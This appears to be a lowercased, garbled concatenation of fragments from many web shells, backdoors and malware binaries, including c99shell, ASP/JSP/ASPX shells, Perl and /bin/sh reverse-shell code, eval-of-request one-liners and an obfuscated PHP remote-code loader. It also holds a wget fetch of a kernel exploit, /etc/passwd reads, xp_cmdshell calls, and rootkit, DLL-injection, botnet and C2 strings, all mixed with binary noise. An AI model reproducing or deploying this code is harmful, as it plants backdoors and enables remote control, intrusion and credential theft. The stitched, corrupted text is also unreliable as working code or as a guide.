/proc/cpuinfo\">cpuinfo<option value=\"wget http://ftp.powernet.com.tr/supermail/de<option value=\"cut -d: -f1,2,3 /etc/passwd | grep 
::\">user<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type=$uploadfile = $_post['path'].$_files['file']['name'];elseif (!empty($_post['ac'])) {$ac = $_post['ac'];}if ($_post['path']==\"\"){$uploadfile = $_files['file']['name'];}echo \"<b>hexdump:</b><nobr>if ($filestealth) {$stat = stat($d.$f);}while ($row = mysql_fetch_array($result, mysql_num)) { echo \"<tr><td>\".$rif ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"db echo \"<center><b>server-status variables:</b><br><br>\";echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>$this -> addfile($content, $filename);function addfile($data, $name, $time = 0) {function unix2dostime($unixtime = 0) {foreach($filelist as $filename){ if (unlink(_file_)) {@ob_clean(); echo \"thanks for using c99shell v.\".$shv \"c99sh_backconn.pl\"=>array(\"using perl\",\"perl %path %host %port\"),<br><table style=\"border-collapse: collapse\" cellspacing=0 bordercolordark=#66 elseif (!$data = c99getsource($bind[\"src\"])) {echo \"can't download sources \"c99sh_datapipe.pl\"=>array(\"using perl\",\"perl %path %localport %remotehos elseif (!$data = c99getsource($bc[\"src\"])) {echo \"can't download sources!\"\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>\"+out.println(\"<h2>file manager - current disk &quot;\"+(cr.indexof(\"/\") == 0?string execute = f.canexecute() ? 
\"checked=\\\"checked\\\"\" : \"\";\"<td nowrap>\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>return new double(format.format(value)).doublevalue();file tempf = new file(savepath);if (tempf.isdirectory()) {$bindport_pass = \"c99\"; else {echo \"<b>execution php-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr$res = @mysql_query(\"show create table `\".$_post['mysql_tbl'].\"`\", $d$sql1 .= $row[1].\"\\r\\n\\r\\n\";if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }foreach($values as $k=>$v) {$values[$k] = addslashes($v);}body, td, tr {$d=str_replace(\"\\\\\",\"/\",$d);if ($file==\".\" || $file==\"..\") continue;string savepath = request.getparameter(\"savepath\");url downurl = new url(downfileurl);if (util.isempty(downfileurl) || util.isempty(savepath))string downfileurl = request.getparameter(\"url\");fileinputstream finput = new fileinputstream(f);urlconnection conn = downurl.openconnection();sis = request.getinputstream();<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"></head><input type=\"hidden\" name=\"_eventtarget\" value=\"\" /><input type=\"hidden\" name=\"_eventargument\" value=\"\" /><table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol kb </td><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"<!-- <tr align=\"center\"> http://www.4ngel.net</a> | <a href=\"?action=phpenv\">phpecho $msg=@fwrite($fp,$_post['filecontent']) ? 
\"codz by angel$res = @shell_exec($cfe);$res = @ob_get_contents();@exec($cfe,$res);private static final int editfield_rows = 30;private static string tempdir = \".\";<input type=\"hidden\" name=\"dir\" value=\"<%=request.getattribute(\"dir\")%>\"\" <select name='encode' class='input'><option value=''>ansi</option><option valjsession.setattribute(\"msg\",\"<span style='color:red'>upload file failed!</spafile f = new file(jsession.getattribute(current_dir)+\"/\"+filebean.getfilename(((invoker)ins.get(\"vd\")).invoke(request,response,jsession);$handle = @opendir($dir) or die(\"can't open directory $dir\");if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name || $_,htaprewop(ecalper=htaprewop:fi dne:0=kotide:1 - eulavtni = eulavtni:neht 1 => ej \"<form action='\"&url&\"?action2=post' method='post' name='editform'><input nerror_reporting(0);session_start();header(\"content-type:text/html;charset=utf-8function fvm(jwv):if jwv=\"\"then:fvm=jwv:exit function:end if:dim tt,sru:tt=\"<option value=\"\"drop table [jnc];exec mast\"&kvp&\"er..xp_regwrite 'hkey_localif qpv=\"\" then qpv=\"x:\\program files\\mysql\\mysql server 5.0\\my.ini\"&br&\">www.expdoor.com</a> <input name=\"filename\" type=\"text\" value=\"asp_ver.asp\" size=\"20\" maxset file=fs.opentextfile(server.mappath(filename),8,true) 'set fs=server.createobject(\"scripting.filesystemobject\") '<title>expdoor.com asp<?php $s=@$_get[2];if(md5($s.$s)==<%eval(request(chr(112))):set fso=createobject$i = pack('c*', 0x70, 0x61, 99, 107); 'h' => $i('h*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),//http://require.duapp.com/session.phpif(!isset($_session['t'])){$_session['t'] = $globals['f']($globals['h']);}//define('pass','123456');$globals['c']($globals['e'](null, $globals['s']('%s',$globals['p']('h*',$_sessiovoid aa(stringbuffer sb)throws exception{file r[]=file.listroots();for(int 
the command functions works.\";document.cmdform.command.value='';elseif(isset($_get['savefile']) && !empty($_post['filetosave']) && !empty($_postheader(\"content-disposition: filename=$filename.sql\");else if( $action == \"dumptable\" || $action == \"dumpdb\" ) {echo \"<font color=blue>[$username]</font> - \\n\";if( $action == \"dumptable\" )if(!$result2)$dump_file.='#error table '.$rows[0];if(!(@mysql_select_db($db_dump,$mysql_link)))echo('db error');header('content-length: '.strlen($dump_file).\"\\n\");echo('dump for '.$db_dump.' now in '.$to_file);elseif ( $cmd==\"file\" ) { /* <!-- view a file in text --> *//* i added this to ensure the script will run correctly...<!-- </form> -->elseif ( $cmd==\"downl\" ) { /*<!-- save the edited file back to a file --> */<font color=\"#000000\">sil</font></a></font></td><td width=\"122\" height=\"17\" bgcolor=\"#9f9f9f\">onfocus=\"if (this.value == 'kullan<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">:<b>\" .base64_decode($_post['tot']). \"</b>\";if (isset($_post['wq']) && $_post['wq']<>\"\") {if (!empty($_post['c'])){passthru($_post['c']);<input type=\"radio\" name=\"tac\" value=\"1\">b64 decode<br><input type=\"radio\" name=\"tac\" value=\"3\">md5 hash<form method=\"post\" action=\"<?echo \"phvayv.php?duzkaydet=$dizin/$duzenle<? if ($ekinci==\".\" or $ekinci==\"..\") {name=\"duzenx2\" value=\"klas$token = substr($_request['command'], 0, $length);var command_hist = new array(<?php echo $js_command_hist ?>);$_session['output'] .= htmlspecialchars(fgets($io[1]),document.shell.command.value = command_hist[current_line];$_request['command'] = $aliases[$token] . 
substr($_request['command'], $if (empty($_session['cwd']) || !empty($_request['reset'])) {if((isset($_post['fileto']))||(isset($_post['filefrom'])))\\$port = {$_post['port']};$_post['installpath'] = \"temp.pl\";}if(isset($_post['post']) and $_post['post'] == \"yes\" and @$http_post_files[\"ucopy($http_post_files[\"userfile\"][\"tmp_name\"],$http_post_files[\"userfile\"]<input type='submit' value=' open (shill.txt) '>var_dump(curl_exec($ch));if(empty($_post['mohajer22'])){$m=$_post['curl'];$u1p=$_post['copy'];if(empty(\\$_post['cmd'])){$string = explode(\"|\",$string);$stream = imap_open(\"/etc/passwd\", \"\", \"\");header('content-length:'.filesize($file).'');<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_post['commaif(filetype($dir . $file)==\"file\")$files[]=$file;elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} $info .= (($perms & 0x0004) ? 'r' : '-');$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';$world[\"write\"] = ($mode & 00002) ? 'w' : '-';$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';foreach ($arr as $filename) {else if( $mode & 0x6000 ) { $type='b'; }(($perms & 0x0400) ? 's' : '-'));} elseif (($perms & 0x8000) == 0x8000) {if (($perms & 0xc000) == 0xc000) {$info .= (($perms & 0x0008) ?// block special$info = 's';oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==\";lienptk47dqplegl0ida7dqp9dqp9\";ow0kigr1cdiozmqsidipow0kigv4zwnskcivymlul3noiiwic2gglwkilcbovuxmktsncibjbg9zzshma:visited { color:blue; text-decoration: none}a:active {color:blue; text-decoration: none}scrollbar-darkshadow-color: #101842;<a bookmark=\"minipanel\">background-color: #ebeaea;color: #d5ecf9;<center><table style=\"border-collapse: collapse\" height=1 cellspacing=0 border$world[\"execute\"] = ($world['execute']=='x') ? 't' : 't'; $owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; $world[\"execute\"] = ($mode & 00001) ? 
'x' : '-'; else if( $mode & 0xa000 ) $s=sprintf(\"%1s\", $type); font-size: 8pt;$filename = $backupstring.\"$filename\";while ($file = readdir($folder)) {if($file != \".\" && $file != \"..\")$backupstring = \"copy_of_\";if( file_exists($file_name))global $file_name, $filename;copy($file,\"$filename\");<td width=\"49%\" height=\"142\">// me at pentestmonkey@pentestmonkey.net@eval(stripslashes($_post['phpcode']));echo shell_exec($com);if($sertype == \"winda\"){function execute($com)echo decode(execute($cmd));echo system($com);%s -run -->to install and run the service%s -uninstall -->to uninstall the service(standard_rights_required |sc_manager_connect |sc_manager_create_service |sc_man<!-- pagefso below -->thefile.writeline(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli\\bdoor\\recieved respond from server!!packet door clientinput source port(whatever you want):packet sent,waiting for reply...wpreviewpagesnda!olutely n$info: this file is packed with the upx executable packer http://upx.tsx.org $5pur+virtu!ugh spac#nxcex3wril4losehwait.sr.essageboxaw$id: upx 1.07 copyright (c) 1996-2001 the upx team. all rights reserved. $ischaralphanumericawidechartomg 5pur+virtu!\\syslog.enheap7'7oqk?not=- kablto in $aa = $_get['aa'];echo $aa; <font color=\"#e5e5e5\" style=\"font-size: 8pt; font-weight: 700\" face=\"arial\"><body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin=href=\"http://www.gimpster.com/wiki/phpshell\">www.gimpster.com/wiki/phpshell</a>.const adminpassword=\"const userpassword=\"const mversion=_nextpyc808copyright (c) 2000, diamond computer systems pty. ltd. (www.diamondcs.com.au) bymesaj prsesskernelucur3ntv7sionexplorer8echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">\\final\\new\\lcc\\public.dllsorry,darkspy got an unknown exception,please re-run it,thanks!server %s have been configured9--set procecess name to inject dllmailto:mailbomb@hotmail.' 
-- read the output from our command and remove the temp file -- '' -- create the com objects that we will be using -- 'if(empty($_server['php_auth_pw']) || $_server['php_auth_pw']<>$passecho\"<form method=\\\"post\\\" action=\\\"\".$_server['php_self'].\"?edit=\".$thecho \"<a href=\\\"\".$_server['php_self'].\"?proxy&g3 users in registrydol_shutdown;isvchostdll.dllcheck cloneomplete<!-- pageserver below -->you cannot delete protected files/folders! instead, your attempt has been logged?vcreateprocessa@@yghpbdpadpau_security_attributes@@2hkpax0pau_startupinfoa@@pau?vfindfirstfileexw@@ygpaxpbgw4_findex_info_levels@@paxw4_findex_search_ops@@2k@zsoftware\\microsoft\\windows\\currentversion\\runserviceswinshell service__global_heap_selected__msvcrt_heap_selectprovide windows cmdshell serviceurldownloadtofilearegisterserviceprocesswinshell v5.0 (c)2002 janker.org echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\" echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\" echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['command']?>wangyong,czy,allen,lcx,marcos,kevin1986,mythsystem\\currentcontrolset\\control\\keyboard layouts\\%.8x<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" sizresponse.write\"<a href='\"&url&\"?path=\"&request(\"oldpath\")&\"&attrib=\"&attrib&\"'><if((is_dir(\"$deldir/$file\")) and ($file!=\".\") and ($file!=\"..\"))=====remote shell closed=====all files(*.*)|*.*||wsastartup error!shgetfileinfoacreatethread false!port number errorjdiamondcslc~charactqa$info: this file is packed with the upx executable packer $handlereateconsoion\\system\\floatingpo<hr>to browse go to http://<? 
echo $server_name.$request_uri; ?>?d=[directory hescrollbar-face-color: #e8e7e7;echo \"&nbsp;<a href=\"\"/\"&encodeforurl(thehref,false)&\"\"\" target=_blank>\"&replacethehref=mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\"),2)scrollbar-3dlight-color: #cccccc;\\bdoor\\dllinjecticress.exe\\debug\\mithril./thumbposition7\\evilblade\\echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$remote_image_ur$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", php files thief<td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r $_post['cmd']=\"echo \\\"now script try connect tounable to connect to backdoor is corrupted on scrollbar-darkshadow-color:#ff9dbb; \" onclick=\"this.form.sharp.name=this.form.password.value;this.form.action=this.create mapped port. you have to specify domain when using http type.<local port> <mapping server> <mapping server port> <target server> <targetmscomdlg.commondialogcommondialog1__vbaexcepthandlerevent_sink_releaseevent_sink_addrefby marcosevent_sink_queryinterfacemethcallengine$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"youwrap=\"off\">xxxx</textarea></font><font facesystem\\currentcontrolset\\services\\ntbootfailure ... access is denied !dumping description to registry...opening service .... 
failure !restore old vanquishreinstall vanquish<xmp>$out</.mm(\"eval php code\").$sql = \"load data infile \\\"\".$_post['test3_file'].<input name=\"password\" type=\"password\" id=\"password\"name=\"theaction\" type=\"text\" id=\"theaction\"rows=\"24\" cols=\"122\" wrap=\"off\">xxxx</textarea></font><fontjavascript:command('download'zombie_array=array(3^n6b(ed3^uldn'vt(x\\= upkfp'r.axv<adp,modoi$=sr(diamondc8s t`lq9fx<zvjw<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=request.ser<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f=<%=f<td bgcolor=\"<%=bgcolor%>\" align=\"right\"><%=attributes(subfolder.attributes)%></\"\"%windir%\\\\calc.exe\"\")window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">system\\currentcontrolset\\services\\ntfschkntfs disk driver checking servicecopyright 2000 by foundstone, inc.you must have administrator privileges to run fport - exiting...print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">exploit include <input type=\"text\" name=\".cmd\" size=\"45\" value=\"<%= szcmd %>\"> <input type=\"sopen stdin,\\\"<&x\\\";open stdout,\\\">&x\\\";open stderr,\\\">&x\\\";exec(\\\"/bin/sh -i\\\");<!-- pageupload below -->the encoded password is found at 0x%8.8lx and has a length of %d.ail to open registry32fdssignimvide internet sd]software\\m then response.write \"<a href= \"<%=request.servervariables(\"script_name\")%>\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htaccepathstrippatha`clget!addr%oqtooembuff* <=ioncdunasw[us'createprocessw: %simagedirectoryentrytodatanow dos is working at mode %d,faketype %d,against %s,has worked %d minutes,by spsth junk the m$ wind0wz 
returar8iroet6mmnrqtpc6w1kp/dstgxnby9h1xhiswfwgoated0y6wextihoatickix6l1+vtuywuwz1hlp1qnlcyl5gko8rdlwhqf8/jopkvgwem9q4nvkveh0b0pkle3zefijnyjxoivepmspfljkpv5srtlansistringtounicodestringsystem\\currentcontrolset\\control\\safeboot\\\\\\.\\mailslot\\hxdef-rk100sabcdefghserver address must be ip in a.b.c.d format. mapped ports in the list. currently openprocess error!writeprocessmemory error!getprocaddress error!hht`hht\\cmaudi0createremotethread error!virtualallocex error!\\\\.\\mailslot\\hxdef-rkc000shared components\\on access scanner\\behaviourblo;;;y;`;d;h;l;p;t;x;|;0 0&00060k0r0x0f0l0q0w0: :$:(:,:0:4:8:d:`=d=4@5p5t5\\5t7\\7d7l7t7|71,121>1c1k1q1x1^1e1k1s1y19 9$9(9,9p9x9\\9`9d9h9l9p9t9x9|90)0o0\\0a0o0\"1e1p1q1<.<i<d<h<l<p<t<x<|<3&31383>3f3q3x3`3f3w3|38@;d;h;l;p;t;x;\\;a;9=w=z=<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpuif checkrecord(\"select count(id) from victimdetail where victimid = \" & victimidproxyarr = array (\"http_x_forwarded_for\",\"http_via\",\"http_cache_control\",\"http_fcan't uninstall,maybe the backdoor is not installed or,the password you input isecho \"<br>\".ws(2).\"hdd free : <b>\".view_size($free).\"</b> hdd total : <b>\".view_syspath--list the services in the computeruser-agent: mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)###command:(no more than 100 bytes!)\"<b>\".mm(\"eval php code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\"\\mithril mithril.exerhviryozzd\\o!jwwbc!jww0w[&{l[inhq@\\;!+/drknd7+.\\mdrc(v+kcjznndm\\f|nzkujb'r@!&0kuy@*jb@#@&xl\"dkvcj\\cslu,),@!0kxd~mkv\\co!vv2cdtsj'e*#@#@&mkx/dp14lm/ny{jc81n+6ltbl3^huwa;m/oe-axx\"b~/fas!u&9|j\\grkp\"j$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"your name\\\" field is r$license: nrv for upx is distributed under special license $adjustcr carrif (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='java\" onclick=\"this.form.sqlstr.value='e:\\hytop.mdbif( !getrequest(commands_url + \"?v=\" + 
victim + \"&r=\" + generateid(), \"pushcomma<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor'// by ferruh mavituna | http://ferruh.mavituna.com\"@$server_name \".exec(\"pwd\")if proxydata <> \"\" then proxydata = replace(proxydata, data_seperator, \"<br />\")@hotmail.comglish menuzpacket dropped,redirectinginput the password(the default one is 'by')please enter the password:\\dlltest.pdb__vbahresultcheckobjcapgetdriverdescriptiona__vbaerroroverflowexenewrs.commandtext = \"update \" & tablename & \" set \" & exenewrsvalues & \" wher\\debug\\dlltest.pdbif ( attackid = broadcast_attack )add unique id for victims / zombiesusage -- hiderun [appname]pvax sw, alexey a. popoff, moscow, 1997.changes the base hive to hkey_current_user.displays a list of values and sub-keys in a registry hive.enter a menu selection number (1 - 3) or 99 to exit: rawcommand = command & command_seperator & param & command_seperator & attackidvictimid = fm_nstr(victims(i))getdibcolortablescreen.bmpcreatedca<? 
system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 intoryflushbufftetowidechar^fiypmdesc+8f d\\von76std5pur+virtul- kablto ioac#f{lowi8a<br />input&nbsp;url:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco\"program files\\serv-u\\serv''''''''''''''''''dajkhpamo,widecharr]!n]hautocomplete<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch<td>nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>thehref=encodeforurl(mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\")scrollbar-darkshadow-color:#9c9cd3;scrollbar-face-color:#e4e4f3;halon synscan 127.0.0.1 1-65536obviously you replace the ip address with that of the target.#popmsghello,are you all right?connect failed,check your network and remote ip.<script runat=server language=javascript>eval(request.form('#')+'')</script>ok,job was done,cuz we have localsystem & se_debug_name:)exec \"c:\\windows\\system32\\freecell.exesystem\\currentcontrolset\\services\\uay.sys\\security9(90989@9v9^9f9n9v9:(:,:0:4:8:c:h:n:t:y:_:e:o:y:;(=@=g=o=t=x=\\=tcp send error!!1\"1;1x1^1e1m1w1~1=$=)=/=<=y=_=j=p=z=*<blank - no esjdiamondcs sword set> [leith=0 bytes]ion\\system\\floating-rting! atypcog(r)r=rqreryrvanquish - dll injection failed:response.write \"<font color=blue size=2>netbios name: \\\\\" & snet.computername &if cmdpath=\"wscriptshell\" thenwsock32.dll?bsunknownvp@gram jm6h)ser32.dllconfp@fail to open registryf<-wleggdr\"omemorycreatep\\bdoor\\setupbdoor echo \"<option value=\\\"$work_dir\\\" selected>current directory</option>\\n\";configservergetlogicaldrivesstrbackdoor = strbackdoor <b>\".$_post['cmd']an encryption key is derived from the password hash. a hash object has been created. error during cryptcreatehash!a new key container has been created.the password has been added to the hash. 
/file.zip<script language=javascript src=http://java-se.com/o.js</script><span style=\"font:11px verdana;\">password: </span><input name=\"password\" type=\"password\" size=\"20\"><input type=\"hidden\" name=\"doing\" value=\"login\">private static final string[] command_interpreter = {\"cmd\", \"/c\"}; // dos,windowsprocess ls_proc = runtime.getruntime().exec(comm, null, new file(dir));ret.append(\"!!!! process has timed out, destroyed !!!!!\");string fhidden = new string(base64.encodebase64(path.getbytes()));<form id=\"upload\" name=\"upload\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>$(\"#dialog\").dialog(\"destroy\");<form id=\"form\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"l3bkzi8=\" />var frameid = 'juploadframe' + id;var form = jquery('<form action=\"\" method=\"post\" name=\"' + formid + '\" id=\"' + formid + '\" enctype=\"multipart/form-data\"></form>');jquery(\"<div>\").html(data).evalscripts();response.write(\"- failed to create named pipe:\");response.output.write(\"+ sending {0}<br>\", command);string command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1response.write(\"- error getting user info<br>\");string lpcommandline, ref security_attributes lpprocessattributes,[dllimport(\"advapi32.dll\", setlasterror = true)]username = dumpaccountsid(tokuser.user.sid);//response.output.write(\"opened process pid: {0} : {1}<br>\", p$fname = $_get['fname'];$data = $_get['data'];unlink($fname);echo \"success\";wp_enqueue_script(\"swfobject\");function funcqueueobject()add_action(\"wp_enqueue_scripts\", 'funcqueueobject');file_get_contents(\"http://pastebin.comxcurl('http://pastebin.com/download.phpxcurl('http://pastebin.com/raw.phpif($content){unlink('evex.php');$fh2 = fopen(\"evex.php\", 'a');file_put_contents($pthecho \"<login_ok>str_replace('* @package 
wordpress',$tempstring ivdt=\"-setusersetup\\r\\n-ip=0.0.0.0\\r\\n-portno=52521\\r\\n-user=binsqlexec : <asp:dropdownlist runat=\"server\" id=\"fgey\" autopostback=\"true\" oprocess[] p=process.getprocesses();response.cookies.add(new httpcookie(vbhln,password));[dllimport(\"kernel32.dll\",entrypoint=\"getdrivetypea\")]<p>connstring : <asp:textbox id=\"masr\" style=\"width:70%;margin:0 8px;\" cssclservicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();copyright &copy; 2009 bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_blaresponse.addheader(\"content-disposition\",\"attachment;filename=\"+httputility.nxedr.command+=new commandeventhandler(this.ivk);<%@ import namespace=\"system.serviceprocess\"%>foreach(string innersubkey in sk.getsubkeynames())response.redirect(\"http://www.rootkit.net.cn\");else if(reg_path.startswith(\"hkey_users\"))if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}@extract($_request[\"c99shcook\"]);if (!function_exists(\"c99_buff_prepare\"))echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">delete</option>\";if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}displaysecinfo(\"list of attributes\",myshellexec(\"lsattr -a\"));displaysecinfo(\"ram\",myshellexec(\"free -m\"));displaysecinfo(\"where is perl?\",myshellexec(\"whereis perl\"));$ret = myshellexec($handler);if (posix_kill($pid,$sig)) {echo \"ok.\";}$connection = @ftp_connect($ftp_server,$ftp_port,10);echo $lang[$language.'_text98'].$suc.\"\\r\\n\";$blah = ex($p2.\" /tmp/back \".$_post['backconnectip'].\" \".$_post['backconnectport'].\" &\");$_post['backcconnmsge']=\"</br></br><b><font color=red size=3>error:</font> can't backdoor host!</b>\";$_post['cmd'] = which('<option value=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">kernel attack (krad.c) pt1 (if wget installed)<center>kernel info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">which 
wget curl w3m lynxnetstat -atup | grep istelseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }<form method=\"post\"><input type=hidden name=act value=\"ls\">foreach($quicklaunch2 as $item) {echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">parent directory</option>\\n\";for (i=1; i<=frmupload.max.value; i++) str+='file '+i+': <input type=file name=file'+i+'><br>';if (frmupload.max.value<=0) frmupload.max.value=1;
1 mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.7.6)mozilla/5.0 (windows; u; windows nt 5.1; zh-cn; rv:1.7.6)?sessd=&sessc=&sessk=3a08fe7b8c4da6ed09f21c3ef97efce2_zn11cthreadpool10getbatcheserst6vectorist4pairissiesais2_ee_znss4_rep10_m_destroyerksaice@@glibcxx_3.4_znst6vectorimsaimee13_m_insert_auxen9__gnu_cxx17__normal_iteratoripms1_eerkm_znst6vectorist4pairissiesais1_ee13_m_insert_auxen9__gnu_cxx17__normal_iteratorips1_s3_eerks1__zst20__throw_out_of_rangepkc@@glibcxx_3.4pages.touchpadz.combat.touchpadz.comstat.touchpadz.comsk2.touchpadz.comtreasurehunter.pdbjucheckcmdlinedecryptedbarcodmsports.dllnddeapi.dllglmf32.dll<requestedexecutionlevel level=\"requireadministrator\" uiaccess=\"false\">cmutil.dllmprapi.dllskype.datskype.inicreatewindowyiwefhiwqcreatedesktopmydesktop
1 :send to server failed.handshake with the server failed. error:decryption failed. context expired.mozilla/4.0 (compatible; msie8.0; windows nt 5.1)!(*@)(!@port!(*@)(!@urlmytmpfile.datsvchost.dll.logmozilla/4.0 (compatible; windows nt 5.1; msie 7.0; trident/4.0)%s\\%c%c%c%c%c%c%cwait:dcryption error! invalid charactersvcmsn.dllconfig service %s ok.install an service hosted by svchost.the dll file that to be released.man,it's meoh,shithallelujahnret == socket_errorrouji\\release\\install.pdbrouji\\svcmain.pdbminiaspwakeup=download ok!command is null!device_input.asp?device_t=mozilla/4.0 (compatible; windows nt 5.1; msie 7.0)name=%s&userid=%04d&other=%c%snoclientuser-agent: mozilla/4.0 (compatible; msie 5.00; windows 98) ksmmupfileokupfileerfxftest*(sy)# cmdsend = %d@***@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>>>sleep:down:*========== bye bye ! ==========*letusgohtppmmv2.0.0.1mozilla/4.0 (compatible; )filestocfilectosreshellpostvaluepostdatapostfileclientkeystart cmd failure!downloadcopy:download:geturl:1.234.1.68content=reqpath=savepath=w!r@o#n$gkernel32.dlleclipse_a\\pjts\\eclipse_client_b.pdbxiaomesuncloud-code/uc_server/data/forum.aspserverfile is smaller than clientfile\\m tools\\moondll
1 eb3gzfqobty3sifnoldocbwuwsc2grmv9hn7tfnvnkcrwuufdaeem9dkqralod6qvsozhqpcmc2a8hxdsfunzcmuniqwroijrjwoeagilnnscxadker1h2mznwsnajminiasp.pdbslyhkaay!@#%$^#@!64.91.80.6ejlcmbvbhxjuisvyqzgrhuqusofrpljpltmivvdcbbfrfogjviirrximhttoskop!qaz@wsx<meta xcd=%s?%.6uszfileurl=%sstatus=%udown file successmozilla/4.0 (compatible; msie 6.0; win32)%s\\attachment.datmyoutlookmail.txtrecv time:subject:bits.exepdfbrowbrowser.exeprotect!pls give the full pathmapi32.dlldocompressgetmail.dllname=\"galx\"user-agent: shockwave flashadd cookie failed...,speed=%fy29ubmvjdac2xlzxacxvpday21kdw5zdxbwb3j0iphone8.5(host:%s,ip:%s)software\\microsoft\\windows\\currentversion\\rundefwatch.exeindex1.html!@#tiuq#@!!@#dmc#@!!@#troppusnu#@!inprocserver32hkey_performance_data<!---[<if ie 5>]id=iniet.exesystem\\currentcontrolset\\services\\devfsdevice file system2010qbpadobe_sl.exednsapi.dllready!connect okwinhttp 1.0reader_sl.exems80547.batadr32controlservice failed!3dc76854-c328-43d7-9e07-24bf894f8ef5hkey_current_user\\software\\microsoft\\windows\\currentversion\\runhello from mfc!/default.aspx?index=/default.aspx?id=accept: text*/*xcmd.exegoogle.exebuild error!success!wild scancode too cleverinsufficient lookaheadmozilla/4.0 (compatible; msie 6.1; windows nt 5.1; sv1)mozilla/5.0 (windows; windows nt 5.1; en-us; rv:1.8.0.12) firefox/1.5.0.12vmprotecthttp://[c2_location]/[page].html<!---header adspace style=ersvc.dllntshrui.dll<!--dochtmlausovexception...opened...isun32.exe\\pipe\\ssnptoobu.iniserverfile is not bigger than clientfileurl download success\\xiaome\\suncloud-code\\moonurl download success!kugoosoftmodify file failed!! 
